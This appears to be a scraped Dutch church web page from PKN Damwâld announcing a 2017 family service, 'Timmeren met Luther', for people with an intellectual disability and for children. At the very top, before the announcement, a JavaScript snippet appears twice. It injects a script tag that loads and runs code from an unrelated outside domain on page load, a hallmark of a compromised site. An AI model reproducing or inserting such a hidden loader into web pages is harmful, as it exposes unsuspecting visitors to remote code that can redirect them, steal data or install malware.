;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
29 oktober 2017
10:30 t/m 11:30
Benedictuskerk
Bijzondere gezinsdienst … Welkom !

Zondagmorgen 29 oktober 2017 bent u om 10.30 uur van harte welkom in de Nederlands hervormde Kerk van Dantumawâld, Doniawei 76 in Damwâld,  voor een bijzondere gezinsdienst. Ds. Jaap Miedema in gaan op het thema ‘Timmeren met Luther’. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: BenedictuskerkDoniaweg 76 Damwâld